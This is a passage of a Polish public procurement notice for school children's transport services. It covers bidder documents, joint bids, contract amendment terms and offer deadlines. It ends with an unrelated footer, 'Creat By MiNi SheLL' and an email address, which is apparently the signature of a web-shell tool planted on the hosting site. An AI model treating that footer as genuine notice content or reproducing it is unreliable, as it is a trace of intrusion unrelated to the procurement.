także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 5 do<br/>SWZ),<br/>3) w celu potwierdzenia spełniania warunku, o którym mowa w Rozdziale 6 pkt 3c swz, Wykonawca złoży wykaz posiadanego<br/>potencjału technicznego ze wskazaniem podstawy do dysponowania tymi zasobami (załącznik nr 6 do SWZ),<br/>4) w celu potwierdzenia spełniania warunku, o którym mowa w Rozdziale 6 pkt 2 swz aktualną licencję na wykonywanie krajowego<br/>transportu drogowego lub zezwolenie na wykonywanie zawodu przewoźnika drogowego osób, o którym mowa w art. 5 ust 1 ustawy z<br/>6 września 2001r. o transporcie drogowym (Dz.U. z 2021 r. poz. 919) lub dokument równoważny.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>1) pełnomocnictwo do działania w imieniu tych wykonawców, z podaniem zakresu oraz imienia i nazwiska pełnomocnika,<br/>zgodnie z art. 58 ust. 2 Pzp,<br/>2) załącznik nr 2 składa oddzielnie każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>3) podpisany przez pełnomocnika załącznik nr 3 do SWZ, tj. informację o powierzeniu lub niepowierzeniu podwykonawcy<br/>części zamówienia. Jeżeli wykonawca nie złoży wraz z ofertą przedmiotowego załącznika, zamawiający uzna, że<br/>wykonawca nie powierzy podwykonawcom wykonania żadnej części zamówienia.<br/>4) podpisany przez pełnomocnika załącznik nr 9 do SWZ, z którego będzie wynikać, które usługi wykonają poszczególni<br/>wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień Umowy może zostać dokonana na warunkach określonych w art. 455 ustawy Pzp.<br/>2. Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia Wykonawcy,<br/>z ewentualną zmianą terminu realizacji przedmiotu Umowy, w przypadku zaistnienia co najmniej jednej z następujących<br/>okoliczności:<br/>1) zmiana wynagrodzenia w przypadku ustawowej zmiany przepisów dotyczących procentowej stawki podatku od towarów i<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>usług:<br/>a) zmianie ulegnie kwota wynagrodzenia brutto określona w umowie,<br/>Ogłoszenie nr 2024/BZP 00642662 z dnia 2024-12-10<br/>2024-12-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym<br/>na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>b) zmiana wynagrodzenia nastąpi wyłącznie w stosunku do niezrealizowanej w dniu zmiany stawki podatku od towarów i<br/>usług części zamówienia,<br/>c) do określonego w ofercie wynagrodzenia w odniesieniu do niezrealizowanej części zamówienia zostanie zastosowana<br/>aktualnie obowiązująca stawka podatku od towarów i usług,<br/>d) zmiana wynagrodzenia nastąpi o kwotę wynikającą z różnicy między dotychczasową, a nową stawką podatku od towarów<br/>i usług;<br/>2) zmiana wielkości przedmiotu zamówienia w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy, a<br/>nie powstałych z winy Zamawiającego lub przy zmianie potrzeb wynikłych w trakcie wykonywania niniejszej umowy,<br/>Zamawiający dopuszcza zwiększenie lub zmniejszenie ilości dowożonych dzieci a tym samym możliwość zwiększenia lub<br/>zmniejszenia ilości kilometrów do pokonania na poszczególnych trasach (utworzenie dodatkowej nowej trasy przewozu lub<br/>usunięcie istniejącej). Zmiany te mogą nastąpić w sytuacji rezygnacji danego ucznia z dowozu do szkoły lub zgłoszenie<br/>przez rodzica nowego ucznia do dowozu do szkoły. W momencie wystąpienia w/w sytuacji zmiana wielkości przedmiotu<br/>zamówienia (mniej lub więcej biletów) a tym samym wynagrodzenia nastąpi wyłącznie w stosunku do niezrealizowanej<br/>w dniu zmiany części zamówienia.<br/>3) zmiany terminu rozpoczęcia lub zakończenia świadczenia usług, albo zawieszenia wykonywania Umowy<br/>spowodowanych brakiem możliwości realizacji tych usług przez Wykonawcę ze względu na:<br/>a) czasowe ograniczenie lub czasowe zawieszenie funkcjonowanie jednostek systemu oświaty na obszarze kraju lub jego<br/>części, w przypadkach uzasadnionych nadzwyczajnymi okolicznościami zagrażającymi życiu lub zdrowiu dzieci i młodzieży<br/>na podstawie rozporządzenia ministra właściwego do spraw oświaty i wychowania,.<br/>b) działania siły wyższej –termin ulega wydłużeniu maksymalnie o liczbę dni działania siły wyższej.<br/>4) zmiana zakresu rzeczowego (nowa jednostka oświatowa) w przypadku zapewnienia dowozu dzieci skierowanych do innej<br/>jednostki oświatowej niż wskazana w § 1 ust. 1 niniejszej umowy w okolicznościach, których nie można było przewidzieć w<br/>chwili wszczęcia postępowania o udzielenie zamówienia publicznego lub w chwili zawarcia umowy.<br/>4) wystąpienia innych okoliczności, których nie można było przewidzieć w momencie zawarcia umowy;<br/>3. Zmianą danych podmiotowych Wykonawcy.<br/>4. Zmiana sposobu spełnienia świadczenia, zmiana parametrów realizowanego zamówienia:<br/>a) zmiana pojazdów wskazanych przez Wykonawcę do realizacji przedmiotu umowy, którymi wykonawca będzie świadczył<br/>usługę, na inne pojazdy pod warunkiem, że nowe pojazdy będą spełniać wymagania (warunki) opisane dla tych pojazdów w<br/>SWZ<br/>b) zmiana osób wskazanych przez Wykonawcę do realizacji przedmiotu umowy, które będą uczestniczyć w wykonaniu<br/>zamówienia, na inne lub dodatkowe osoby pod warunkiem, że nowe osoby będą spełniać wymagania (warunki) opisane dla<br/>tej osoby w SWZ i będą zatrudnione na warunkach nie gorszych niż zawarte w SWZ<br/>5. Wszelkie zmiana postanowień zawartej umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-27 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-27 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia: od dnia podpisania umowy jednak nie wcześniej niż od dnia 07 stycznia 2025 r. do dnia 19<br/>grudnia 2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com